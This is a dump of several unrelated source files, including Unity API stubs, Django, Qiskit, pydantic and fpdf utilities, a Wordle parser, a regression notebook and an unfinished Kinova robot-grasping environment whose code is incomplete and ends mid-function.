:type arg1: System.Type
:returns: Component
:rtype: UnityEngine.Component
'''
pass
@staticmethod
def GetComponentInChildren(arg1=None, arg2=None):
pass
@staticmethod
@overload
def GetComponentsInChildren(arg1, arg2):
'''
:param arg1: Type
:type arg1: System.Type
:param arg2: Boolean
:type arg2: System.Boolean or bool
:returns: ComponentArray
:rtype: UnityEngine.ComponentArray
'''
pass
@staticmethod
@overload
def GetComponentsInChildren(arg1):
'''
:param arg1: Type
:type arg1: System.Type
:returns: ComponentArray
:rtype: UnityEngine.ComponentArray
'''
pass
@staticmethod
@overload
def GetComponentsInChildren(arg1, arg2):
'''
:param arg1: Boolean
:type arg1: System.Boolean or bool
:param arg2: Undefined variable
:type arg2: ListT.ListT
'''
pass
@staticmethod
@overload
def GetComponentsInChildren(arg1):
'''
:param arg1: Undefined variable
:type arg1: ListT.ListT
'''
pass
@staticmethod
def GetComponentsInChildren(arg1=None, arg2=None):
pass
@staticmethod
@overload
def GetComponentInParent(arg1):
'''
:param arg1: Type
:type arg1: System.Type
:returns: Component
:rtype: UnityEngine.Component
'''
pass
@staticmethod
def GetComponentInParent(arg1=None):
pass
@staticmethod
@overload
def GetComponentsInParent(arg1, arg2):
'''
:param arg1: Type
:type arg1: System.Type
:param arg2: Boolean
:type arg2: System.Boolean or bool
:returns: ComponentArray
:rtype: UnityEngine.ComponentArray
'''
pass
@staticmethod
@overload
def GetComponentsInParent(arg1):
'''
:param arg1: Type
:type arg1: System.Type
:returns: ComponentArray
:rtype: UnityEngine.ComponentArray
'''
pass
@staticmethod
@overload
def GetComponentsInParent(arg1, arg2):
'''
:param arg1: Boolean
:type arg1: System.Boolean or bool
:param arg2: Undefined variable
:type arg2: ListT.ListT
'''
pass
@staticmethod
def GetComponentsInParent(arg1=None, arg2=None):
pass
@staticmethod
@overload
def GetComponents(arg1):
'''
:param arg1: Type
:type arg1: System.Type
:returns: ComponentArray
:rtype: UnityEngine.ComponentArray
'''
pass
@staticmethod
@overload
def GetComponents(arg1, arg2):
'''
:param arg1: Type
:type arg1: System.Type
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def GetComponents(arg1):
'''
:param arg1: Undefined variable
:type arg1: ListT.ListT
'''
pass
@staticmethod
def GetComponents(arg1=None, arg2=None):
pass
@staticmethod
def GetInstanceID():
'''
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def GetHashCode():
'''
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def Equals(arg1):
'''
:param arg1: Object
:type arg1: System.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def get_name():
'''
:returns: String
:rtype: System.String
'''
pass
@staticmethod
def set_name(arg1):
'''
:param arg1: String
:type arg1: System.String or str
'''
pass
@staticmethod
def ToString():
'''
:returns: String
:rtype: System.String
'''
pass
@staticmethod
def GetType():
'''
:returns: Type
:rtype: System.Type
'''
pass
|
StarcoderdataPython
|
3284583
|
# -*- coding: utf-8 -*-
from django.conf import settings
from django.http.response import Http404
def restrict_for_museum(func):
def view(request, *args, **kwargs):
if request.user.is_authenticated() and request.user.profile.is_museum:
raise Http404()
return func(request, *args, **kwargs)
return view
|
StarcoderdataPython
|
4805830
|
<filename>backend/app/schemas/chat/messages.py
"""Message schemas."""
from datetime import datetime
from pydantic import BaseModel, Field
from ..base import MongoModel, MongoId
class Message(BaseModel):
"""Base Message schema."""
text: str
class MessageIn(Message):
"""Input Message schema."""
class MessageOut(MongoModel, Message):
"""Output Message schema."""
table_id: MongoId
user_id: MongoId
created_at: datetime
class MessageDB(MessageOut):
"""Database Message schema."""
created_at: datetime = Field(default_factory=datetime.utcnow)
|
StarcoderdataPython
|
60216
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Utilities related to Qobj."""
from typing import Dict, Any, Optional, Union, List
from qiskit.qobj import QobjHeader, QasmQobj, PulseQobj
def _serialize_noise_model(config: Dict[str, Any]) -> Dict[str, Any]:
"""Traverse the dictionary looking for ``noise_model`` keys and apply
a transformation so it can be serialized.
Args:
config: The dictionary to traverse.
Returns:
The transformed dictionary.
"""
for k, v in config.items():
if isinstance(config[k], dict):
_serialize_noise_model(config[k])
else:
if k == 'noise_model':
try:
config[k] = v.to_dict(serializable=True)
except AttributeError:
# if .to_dict() fails is probably because the noise_model
# has been already transformed elsewhere
pass
return config
def update_qobj_config(
qobj: Union[QasmQobj, PulseQobj],
backend_options: Optional[Dict] = None,
noise_model: Any = None
) -> Union[QasmQobj, PulseQobj]:
"""Update a ``Qobj`` configuration from backend options and a noise model.
Args:
qobj: Description of the job.
backend_options: Backend options.
noise_model: Noise model.
Returns:
The updated ``Qobj``.
"""
config = qobj.config.to_dict()
# Append backend options to configuration.
if backend_options:
for key, val in backend_options.items():
config[key] = val
# Append noise model to configuration. Overwrites backend option
if noise_model:
config['noise_model'] = noise_model
# Look for noise_models in the config, and try to transform them
config = _serialize_noise_model(config)
# Update the Qobj configuration.
qobj.config = QobjHeader.from_dict(config)
return qobj
def dict_to_qobj(qobj_dict: Dict) -> Union[QasmQobj, PulseQobj]:
"""Convert a Qobj in dictionary format to an instance.
Args:
qobj_dict: Qobj in dictionary format.
Returns:
The corresponding QasmQobj or PulseQobj instance.
"""
if qobj_dict['type'] == 'PULSE':
_decode_pulse_qobj(qobj_dict) # Convert to proper types.
return PulseQobj.from_dict(qobj_dict)
return QasmQobj.from_dict(qobj_dict)
def _decode_pulse_qobj(pulse_qobj: Dict) -> None:
"""Decode a pulse Qobj.
Args:
pulse_qobj: Qobj to be decoded.
"""
pulse_library = pulse_qobj['config']['pulse_library']
for lib in pulse_library:
lib['samples'] = [_to_complex(sample) for sample in lib['samples']]
for exp in pulse_qobj['experiments']:
for instr in exp['instructions']:
if 'val' in instr:
instr['val'] = _to_complex(instr['val'])
if 'parameters' in instr and 'amp' in instr['parameters']:
instr['parameters']['amp'] = _to_complex(instr['parameters']['amp'])
def _to_complex(value: Union[List[float], complex]) -> complex:
"""Convert the input value to type ``complex``.
Args:
value: Value to be converted.
Returns:
Input value in ``complex``.
Raises:
TypeError: If the input value is not in the expected format.
"""
if isinstance(value, list) and len(value) == 2:
return complex(value[0], value[1])
elif isinstance(value, complex):
return value
raise TypeError("{} is not in a valid complex number format.".format(value))
|
StarcoderdataPython
|
1700097
|
# Copyright (c) 2012 <NAME>, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
from multiconf.repeatable import Repeatable
from multiconf import ConfigItem, ConfigBuilder
def check_containment(start_item, level=0, prefix=" "):
for key, item in start_item.iteritems():
if isinstance(item, Repeatable):
for _rkey, ritem in item.iteritems():
check_containment(ritem, level+1, "R ")
if isinstance(item, ConfigItem) and not isinstance(item, ConfigBuilder):
assert id(item.contained_in) == id(start_item), \
"item.contained_in: " + repr(id(item.contained_in)) + ('name=' + item.contained_in.name if hasattr(item.contained_in, 'name') else '') + \
repr(type(item.contained_in)) + \
", start_item: " + repr(id(start_item)) + ('name=' + start_item.name if hasattr(start_item, 'name') else '') + \
repr(type(start_item))
check_containment(item, level+1)
|
StarcoderdataPython
|
99900
|
#stupid hacky stuff
logging = 0
exec(open("./wordle-evaluator.py").read())
hardMode = False
def load_freq():
with open('unigram_freq.csv') as f:
freq = {}
f.readline()
for line in f:
freq[line.split(',')[0].strip().upper()] = int(line.split(',')[1])
return freq
def add_freq():
with open('unigram_freq.csv') as f:
freq = {}
f.readline()
for line in f:
freq[line.split(',')[0].strip().upper()] = int(line.split(',')[1])
file = open('wordle-guesses.txt', 'r')
wfile = open('wordle-g-freq.csv', 'w')
for l in file:
if l.strip() in freq.keys():
wfile.write(l.strip() + "," + str(freq[l.strip()]) + '\n')
else:
wfile.write(l.strip() + ",0\n")
def transform(s):
s = s.replace(":black_large_square:", "X")
s = s.replace(":white_large_square:", "X")
s = s.replace(":large_green_square:", "G")
s = s.replace(":large_yellow_square:", "Y")
s = s.replace("⬛", "X")
s = s.replace("⬜", "X")
s = s.replace("🟨", "Y")
s = s.replace("🟩", "X")
return s
def loadGuesses(answer):
logging.info("Loading answer tables")
freq = load_freq()
results = {}
last_pos = 0;
with open("gamut.csv", "r") as g:
for l in g:
ls = l.split(",")
gAnswer = ls[0]
if gAnswer == answer:
gGuess = ls[1]
gResult = ls[2]
t = results.setdefault(gResult, [])
t.append((gGuess,freq.setdefault(gGuess, 0)))
return (results)
def loadSequence(filename, answer):
gamut = loadGuesses(answer)
with open(filename) as f:
l = f.readline()
if not l.startswith("Wordle"):
logging.info("This is not a Wordle share file.")
quit()
if l.count('X/6') > 0:
logging.info("Cannot process non-winning sequences.")
quit()
if l.count('*') > 0:
hardMode = True
for a in f:
h = transform(a).strip().upper()
print(gamut[h])
loadSequence("share.txt","QUERY")
|
StarcoderdataPython
|
3285913
|
import json
from . import geo, date, data, calc
geo = geo
date = date
data = data
calc = calc
# Outputs JSON for the given dictionary or list to the given path.
def save_json(x, path, quiet=False): # pragma: no cover
with open(path, 'w+') as output_file:
output_file.write(json.dumps(x, separators=(',', ':')))
if not quiet:
print(f'Saved {path}')
# Returns only the unique elements in a list
def unique(l):
unique_list = []
for item in l:
if item not in unique_list:
unique_list.append(item)
return unique_list
|
StarcoderdataPython
|
64048
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""Demo236_House_Preprocessed.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1D-6jwkEPkq3S7AiHnSH2SYp6FJPGArlF
"""
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
from itertools import product
"""## Get Dataset"""
def get_regression(X, y, regressors,texts):
f, axarr = plt.subplots(2,2, sharex='col', sharey='row', figsize=(10, 8))
for idx, clf, tt in zip(product([0, 1], [0, 1]),
regressors,
texts):
y_pred = clf.predict(np.sort(X_test.reshape(-1)).reshape(-1,1))
axarr[idx[0], idx[1]].plot(np.sort(X_test.reshape(-1)).reshape(-1,1), y_pred)
axarr[idx[0], idx[1]].scatter(X, y, c=y,
s=20, edgecolor='k')
axarr[idx[0], idx[1]].set_title(tt)
plt.show()
def report_regression( X, y,regressors,texts):
from sklearn.metrics import mean_squared_error as mse
results = {}
for clf, tt in zip( regressors,
texts):
y_pred = clf.predict(X)
results[tt] = mse(y, y_pred)
return results
from google.colab import drive
drive.mount("/content/gdrive")
data = pd.read_csv('/content/gdrive/My Drive/Colab Notebooks/FeatureSelection/train_house.csv')
data.keys()
y = data.SalePrice
X = data.drop(columns=['SalePrice'])
X.dtypes
X['SaleCondition'].dtype
objs = []
nums = []
for i in X.columns:
if X[i].dtype == 'O':
objs.append(i)
else:
nums.append(i)
na_objs = []
na_nums = []
for i in X.columns:
if (X[i].isnull().sum() > 0):
print(i, " ", X[i].isnull().sum())
if X[i].dtype == 'O':
na_objs.append(i)
else:
na_nums.append(i)
na_nums
na_objs
def impute(df, columns, dft):
df_temp = df.copy()
for column in columns:
df_temp[column] = df_temp[column].apply(lambda x: np.random.choice(dft[column].dropna().values) if pd.isnull(x) else x)
return df_temp
X = impute(X,na_nums + na_objs , X)
X.isnull().sum()
X.head()
for col in objs:
mapper = {k:i for i, k in enumerate(X[col].unique(), 0)}
X[col] = X[col].map(mapper)
X.head()
objs_oh = []
for col in objs:
if len(X[col].unique())>2:
objs_oh.append(col)
objs_oh
len(X.columns)
for i in objs_oh:
X = pd.concat([X, pd.get_dummies(X[i], prefix = i, drop_first=True)], axis=1)
X = X.drop(columns=objs_oh)
len(X.columns)
# from sklearn.decomposition import PCA
# obj = PCA()
# X = obj.fit_transform(X)
# TRAIN TEST SPLIT
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
from sklearn.tree import DecisionTreeRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor
regressors = [
DecisionTreeRegressor().fit(X_train, y_train),
KNeighborsRegressor().fit(X_train, y_train),
SVR(gamma=.1, kernel='rbf').fit(X_train, y_train),
RandomForestRegressor().fit(X_train, y_train)
]
texts = [ "DecisionTreeRegressor",
"KNeighborsRegressor",
"SVR",
"RandomForestRegressor"]
# get_regression(X_test, y_test, regressors, texts)
report = report_regression( X_test, y_test,regressors,texts)
report
keys = list(report.keys())
vals = [float(report[k]) for k in keys]
sns.barplot(x=keys, y=vals)
|
StarcoderdataPython
|
1681404
|
class Solution:
def countVowelStrings(self, n: int) -> int:
dp = [[i for i in range(5,0,-1)] for _ in range(n)]
for i in range(1,n):
for j in range(3,-1,-1):
dp[i][j] = dp[i - 1][j] + dp[i][j + 1]
return dp[n-1][0]
|
StarcoderdataPython
|
1629092
|
import sys
import argparse
import pandas as pd
import numpy as np
parser = argparse.ArgumentParser(description='Create dummy reference data.')
parser.add_argument('--items',
help='Input cscv with items. default: %(default)s',
metavar='<name>',
default='items.csv')
parser.add_argument('--case_ids',
help='Input txt with case ids. default: %(default)s',
metavar='<name>',
default='case_ids.txt')
parser.add_argument('--reference',
help='Output reference csv. default: %(default)s',
metavar='<name>',
default='reference.csv')
args = parser.parse_args()
df_items = pd.read_csv(args.items,
dtype=str,
keep_default_na=False,
na_values=[],
encoding='cp932')
with open(args.case_ids) as f:
case_ids = f.read().splitlines()
data = np.random.randint(0, 100, (len(case_ids), len(df_items)))
df_ref = pd.DataFrame(data, columns=df_items['id'], index=case_ids)
df_ref.index.name = 'id'
df_ref.to_csv(args.reference, encoding='cp932')
|
StarcoderdataPython
|
109565
|
import math
def buildSparseTable(arr, n):
for i in range(0, n):
lookup[i][0] = arr[i]
j = 1
while (1 << j) <= n:
i = 0
while (i + (1 << j) - 1) < n:
if (lookup[i][j - 1] <
lookup[i + (1 << (j - 1))][j - 1]):
lookup[i][j] = lookup[i][j - 1]
else:
lookup[i][j] = lookup[i + (1 << (j - 1))][j - 1]
i += 1
j += 1
def query(L, R):
j = int(math.log2(R - L + 1))
if lookup[L][j] <= lookup[R - (1 << j) + 1][j]:
return lookup[L][j]
else:
return lookup[R - (1 << j) + 1][j]
if __name__ == "__main__":
a = [7, 2, 3, 0, 5, 10, 3, 12, 18]
n = len(a)
MAX = 500
lookup = [[0 for i in range(MAX)] for j in range(MAX)]
buildSparseTable(a, n)
print(query(0, 4))
print(query(4, 7))
print(query(7, 8))
|
StarcoderdataPython
|
74694
|
"""
Project Euler Problem 174: https://projecteuler.net/problem=174
We shall define a square lamina to be a square outline with a square "hole" so that
the shape possesses vertical and horizontal symmetry.
Given eight tiles it is possible to form a lamina in only one way: 3x3 square with a
1x1 hole in the middle. However, using thirty-two tiles it is possible to form two
distinct laminae.
If t represents the number of tiles used, we shall say that t = 8 is type L(1) and
t = 32 is type L(2).
Let N(n) be the number of t ≤ 1000000 such that t is type L(n); for example,
N(15) = 832.
What is ∑ N(n) for 1 ≤ n ≤ 10?
"""
from collections import defaultdict
from math import ceil, sqrt
def solution(t_limit: int = 1000000, n_limit: int = 10) -> int:
"""
Return the sum of N(n) for 1 <= n <= n_limit.
>>> solution(1000,5)
249
>>> solution(10000,10)
2383
"""
count: defaultdict = defaultdict(int)
for outer_width in range(3, (t_limit // 4) + 2):
if outer_width * outer_width > t_limit:
hole_width_lower_bound = max(
ceil(sqrt(outer_width * outer_width - t_limit)), 1
)
else:
hole_width_lower_bound = 1
hole_width_lower_bound += (outer_width - hole_width_lower_bound) % 2
for hole_width in range(hole_width_lower_bound, outer_width - 1, 2):
count[outer_width * outer_width - hole_width * hole_width] += 1
return sum(1 for n in count.values() if 1 <= n <= 10)
if __name__ == "__main__":
print(f"{solution() = }")
|
StarcoderdataPython
|
3336475
|
<gh_stars>0
import click
@click.command()
@click.option('--name', default="world", help="Name to use when printing 'hello'")
def main(name):
click.echo("Hello %s" % name)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
13544
|
# created by <NAME>
# 7/8/16
import classes as c
def printIntro():
print 'Welcome to the\n'
print '''__/\\\\\\\\\\\\\\\\\\\\\\\\_________________________________________________\
__________________________\n _\\/\\\\\\////////\\\\\\___________________________________\
______________________________________\n _\\/\\\\\\______\\//\\\\\\___________________\
___________________________________________/\\\\\\______\n _\\/\\\\\\_______\\/\\\\\
\\_____/\\\\\\\\\\\\\\\\___/\\\\\\\\\\\\\\\\\\\\_____/\\\\\\\\\\\\\\\\___/\\\\/\\\\\\\\\\\
\\\\___/\\\\\\\\\\\\\\\\\\\\\\_\n _\\/\\\\\\_______\\/\\\\\\___/\\\\\\/////\\\\\\_\
\\/\\\\\\//////____/\\\\\\/////\\\\\\_\\/\\\\\\/////\\\\\\_\\////\\\\\\////__\n \
_\\/\\\\\\_______\\/\\\\\\__/\\\\\\\\\\\\\\\\\\\\\\__\\/\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\\\
\\\\\\\\\\\\__\\/\\\\\\___\\///_____\\/\\\\\\______\n _\\/\\\\\\_______/\\\\\\\
__\\//\\\\///////___\\////////\\\\\\_\\//\\\\///////___\\/\\\\\\____________\\/\\\\\\_/\\\
\\__\n _\\/\\\\\\\\\\\\\\\\\\\\\\\\/____\\//\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\
\\\\\\\\\\\\__\\//\\\\\\\\\\\\\\\\\\\\_\\/\\\\\\____________\\//\\\\\\\\\\___\n \
_\\////////////_______\\//////////__\\//////////____\\//////////__\\///____________\
__\\//\///____'''
print
print 'created by <NAME>\n'
def getUname():
done = False
while not done:
uname = raw_input("Enter your name: ")
if set(uname) <= set('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'):
if len(uname) <= 40:
done = True
else:
print 'Please keep your name to 40 letters or less'
else:
print 'Please use only letters in your name'
return uname
def createPlayer(name):
#c.Person(mainp [main character or not], name, weight, health, xp)
return c.Person(True, name, 150, 10, 100, 0)
def printIntro1(player):
msg = """==================================================
Welcome to the desert, %s.
"To survival." *clink*
"""
print msg % player.getName()
|
StarcoderdataPython
|
3277816
|
<reponame>LourencoFernando/SMS-Project
"""
Quoting the PDF spec:
> PDF’s logical _structure facilities_ provide a mechanism for incorporating
> structural information about a document’s content into a PDF file.
> The logical structure of a document is described by a hierarchy of objects called
> the _structure hierarchy_ or _structure tree_.
> At the root of the hierarchy is a dictionary object called the _structure tree root_,
> located by means of the **StructTreeRoot** entry in the document catalog.
"""
from collections import defaultdict
from typing import NamedTuple, List, Optional, Union
from .syntax import PDFObject, PDFString, PDFArray
# pylint: disable=inherit-non-class,unsubscriptable-object
class MarkedContent(NamedTuple):
page_object_id: int # refers to the first page displaying this marked content
struct_parents_id: int
struct_type: str
mcid: Optional[int] = None
title: Optional[str] = None
alt_text: Optional[str] = None
class NumberTree(PDFObject):
"""A number tree is similar to a name tree, except that its keys are integers
instead of strings and are sorted in ascending numerical order.
A name tree serves a similar purpose to a dictionary—associating keys and
values—but by different means.
The values associated with the keys may be objects of any type. Stream objects
are required to be specified by indirect object references. It is recommended,
though not required, that dictionary, array, and string objects be specified by
indirect object references, and other PDF objects (nulls, numbers, booleans,
and names) be specified as direct objects
"""
__slots__ = ("_id", "nums")
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.nums = defaultdict(list) # {struct_parent_id -> struct_elems}
def serialize(self, fpdf=None, obj_dict=None):
newline = "\n"
serialized_nums = "\n".join(
f"{struct_parent_id} [{newline.join(struct_elem.ref for struct_elem in struct_elems)}]"
for struct_parent_id, struct_elems in self.nums.items()
)
return super().serialize(fpdf, {"/Nums": f"[{serialized_nums}]"})
class StructTreeRoot(PDFObject):
__slots__ = ("_id", "type", "parent_tree", "k")
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.type = "/StructTreeRoot"
# A number tree used in finding the structure elements to which content items belong:
self.parent_tree = NumberTree()
# The immediate child or children of the structure tree root in the structure hierarchy:
self.k = PDFArray()
class StructElem(PDFObject):
# The main reason to use __slots__ in PDFObject child classes is to save up some memory
# when very many instances of this class are created.
__slots__ = ("_id", "type", "s", "p", "k", "pg", "t", "alt")
def __init__(
self,
struct_type: str,
parent: PDFObject,
kids: Union[List[int], List["StructElem"]],
page: PDFObject = None,
title: str = None,
alt: str = None,
**kwargs,
):
super().__init__(**kwargs)
self.type = "/StructElem"
self.s = (
struct_type # a name object identifying the nature of the structure element
)
self.p = parent # The structure element that is the immediate parent of this one in the structure hierarchy
self.k = PDFArray(kids) # The children of this structure element
self.pg = page # A page object on which some or all of the content items designated by the K entry are rendered
self.t = (
None if title is None else PDFString(title)
) # a text string representing it in human-readable form
self.alt = (
None if alt is None else PDFString(alt)
) # An alternate description of the structure element in human-readable form
class StructureTreeBuilder:
def __init__(self):
"""
Args:
marked_contents (tuple): list of MarkedContent
"""
self.struct_tree_root = StructTreeRoot()
self.doc_struct_elem = StructElem(
struct_type="/Document", parent=self.struct_tree_root, kids=[]
)
self.struct_tree_root.k.append(self.doc_struct_elem)
self.struct_elem_per_mc = {}
def add_marked_content(self, marked_content):
page = PDFObject(marked_content.page_object_id)
struct_elem = StructElem(
struct_type=marked_content.struct_type,
parent=self.doc_struct_elem,
kids=[] if marked_content.mcid is None else [marked_content.mcid],
page=page,
title=marked_content.title,
alt=marked_content.alt_text,
)
self.struct_elem_per_mc[marked_content] = struct_elem
self.doc_struct_elem.k.append(struct_elem)
self.struct_tree_root.parent_tree.nums[marked_content.struct_parents_id].append(
struct_elem
)
def next_mcid_for_page(self, page_object_id):
return sum(
1 for mc in self.struct_elem_per_mc if mc.page_object_id == page_object_id
)
def empty(self):
return not self.struct_elem_per_mc
def serialize(self, first_object_id=1, fpdf=None):
"""
Assign object IDs & output the whole hierarchy tree serialized
as a multi-lines string in PDF syntax, ready to be embedded.
Objects ID assignement will start with the provided first ID,
that will be assigned to the StructTreeRoot.
Apart from that, assignement is made in an arbitrary order.
All PDF objects must have assigned IDs before proceeding to output
generation though, as they have many references to each others.
If a FPDF instance provided, its `_newobj` & `_out` methods will be called
and this method output will be meaningless.
"""
self.assign_ids(first_object_id)
output = []
output.append(self.struct_tree_root.serialize(fpdf))
output.append(self.doc_struct_elem.serialize(fpdf))
output.append(self.struct_tree_root.parent_tree.serialize(fpdf))
for struct_elem in self.doc_struct_elem.k:
output.append(struct_elem.serialize(fpdf))
return "\n".join(output)
def assign_ids(self, n):
self.struct_tree_root.id = n
n += 1
self.doc_struct_elem.id = n
n += 1
self.struct_tree_root.parent_tree.id = n
n += 1
for struct_elem in self.doc_struct_elem.k:
struct_elem.id = n
n += 1
return n
|
StarcoderdataPython
|
3217197
|
#!/usr/bin/env python3
###############
# Author: Paresh
# Purpose: Simulation to Real Implementation on Kinova
# Summer 2020
###############
import numpy as np
import math
import matplotlib.pyplot as plt
import time
import os, sys
from scipy.spatial.transform import Rotation as R
import random
import pickle
import pdb
import torch
import torch.nn as nn
import torch.nn.functional as F
import xml.etree.ElementTree as ET
from classifier_network import LinearNetwork, ReducedLinearNetwork
import re
from scipy.stats import triang
import rospy
from sensor_msgs.msg import JointState
from kinova_msgs.msg import FingerPosition, KinovaPose
from kinova_path_planning import MoveRobot
from geometry_msgs.msg import PoseStamped
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class KinovaGripper_Env:
def init():
self.kinova_rob = MoveRobot()
self.joint_states = JointState()
self.finger_pos = FingerPosition()
self.reward = 0
self.object_pose = KinovaPose()
self.Grasp_Reward = False
self.wrist_pose=np.zeros(3) # The wrist position in world coordinates. Since we using local co-ordinate it is 0
###Grasp Classifier###
self.Grasp_net = LinearNetwork().to(device)
trained_model = "path to model"
model = torch.load(trained_model)
self.Grasp_net.load_state_dict(model)
self.Grasp_net.eval()
###Subscribers###
self.joint_state_sub = rospy.Subscriber('/j2s7s300_driver/out/joint_state', JointState, joint_state_callback, queue_size=1)
self.finger_sub = rospy.Subscriber('/j2s7s300_driver/out/finger_position', FingerPosition, finger_state_callback, queue_size=1)
self.object_pose_sub = rospy.Subscriber('Object pose topic', KinovaPose, object_pose_callback, queue_size=1)
###Publisher###
self.finger_command_pub = rospy.Publisher('/sim2real/finger_command', FingerPosition, queue_size=1)
self.joint_angle_command_pub = rospy.Publisher('/sim2real/joint_angle_command', JointState, joint_angle_client, queue_size=1)
### Finger Position in Radians ###
def get_joint_states(self):
temp = list(self.joint_states.position)
finger_joint_state_value = [0, 0, 0]
finger_joint_state_value[0] = temp[7]
finger_joint_state_value[1] = temp[8]
finger_joint_state_value[2] = temp[9]
return finger_joint_state_value
def get_obj_pose(self):
return self.object_pose
# Function to return the angles between the palm normal and the object location
def get_angles(self):
obj_pose = self.get_obj_pose() #x, y, z
#self._get_trans_mat_wrist_pose()
local_obj_pos=np.copy(obj_pose)
local_obj_pos=np.append(local_obj_pos,1)
obj_wrist = local_obj_pos[0:3]/np.linalg.norm(local_obj_pos[0:3])
center_line = np.array([0,1,0])
z_dot = np.dot(obj_wrist[0:2],center_line[0:2])
z_angle = np.arccos(z_dot/np.linalg.norm(obj_wrist[0:2]))
x_dot = np.dot(obj_wrist[1:3],center_line[1:3])
x_angle = np.arccos(x_dot/np.linalg.norm(obj_wrist[1:3]))
return x_angle,z_angle
# Function to get rewards based only on the lift reward. This is primarily used to generate data for the grasp classifier
def get_reward_DataCollection(self):
obj_target = 0.2
obs = self.get_obs()
lift = rospy.get_param('Goal')
if lift:
lift_reward = 1
done = True
elif obs[5]>obj_target+0.05:
lift_reward=0.0
done=True
else:
lift_reward = 0
done = False
return lift_reward, {}, done
# Function to get rewards for RL training
def get_reward(self):
# object height target
obj_target = 0.2
# Grasp reward
grasp_reward = 0.0
obs = self.get_obs()
network_inputs=obs
inputs = torch.FloatTensor(np.array(network_inputs)).to(device)
#if np.max(np.array(obs[41:47])) < 0.035 or np.max(np.array(obs[35:41])) < 0.015:
outputs = self.Grasp_net(inputs).cpu().data.numpy().flatten()
if (outputs >=0.3) & (not self.Grasp_Reward):
grasp_reward = 5.0
self.Grasp_Reward=True
else:
grasp_reward = 0.0
lift = rospy.get_param('Goal')
if lift:
lift_reward = 50.0
done = True
else:
lift_reward = 0.0
done = False
finger_reward = -np.sum((np.array(obs[41:47])) + (np.array(obs[35:41]))) #Distance between finger and object
reward = 0.2*finger_reward + lift_reward + grasp_reward
return reward, {}, done
# Function to get the dimensions of the object
def get_obj_size(self):
return rospy.get_param('Object_size')
# Function to place the object at a random position near the hand with a probability density designed to create more difficult grasps
#def randomize_initial_pose(self, collect_data, size, shape): #This will get fixed by Stephanie
# return rand_x, rand_y
# Function to get the distance between the digits on the fingers and the object center
def get_finger_obj_dist(self): #TODO:Center of finger to Object center distance
finger_joints = ["f1_prox","f1_prox_1", "f2_prox", "f2_prox_1", "f3_prox", "f3_prox_1", "f1_dist", "f1_dist_1", "f2_dist", "f2_dist_1", "f3_dist", "f3_dist_1"]
obj = self.get_obj_pose()
dists = []
for i in finger_joints:
pos = #Pose Topic
dist = np.absolute(pos[0:2] - obj[0:2])
temp = np.linalg.norm(dist)
dists.append(temp)
return dists
# Function to return global or local transformation matrix
def get_obs(self): #Finger Joint states, Object Distance, Angles
obj_pose = self.get_obj_pose()
obj_pose = np.copy(obj_pose)
x_angle,z_angle = self.get_angles()
joint_states = self.get_joint_states()
obj_size = self.get_obj_size()
finger_obj_dist = self.get_finger_obj_dist()
finger_joints = ["f1_prox", "f2_prox", "f3_prox", "f1_dist", "f2_dist", "f3_dist"]
fingers_6D_pose = []
for joint in finger_joints:
trans = #x y z postiion
for i in range(3):
fingers_6D_pose.append(trans[i])
fingers_6D_pose = fingers_6D_pose + list(self.wrist_pose) + list(obj_pose) + joint_states + [obj_size[0], obj_size[1], obj_size[2]*2] + finger_obj_dist + [x_angle, z_angle] #+ range_data
return fingers_6D_pose
#Function to reset the simulator
def reset(self):
obj = rospy.get_param('Object')
rand_pos = np.random.randint(0, 30)
if obj == 1:
if rand_pos == 1:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 2:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 3:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 4:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 5:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 6:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 7:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 8:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 9:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 10:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 11:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 12:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 13:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 14:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 15:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 16:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 17:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 18:
Joint_state = [0, 0, 0, 0, 0, 0,0]
elif rand_pos == 19:
Joint_state = [0, 0, 0, 0, 0, 0,0]
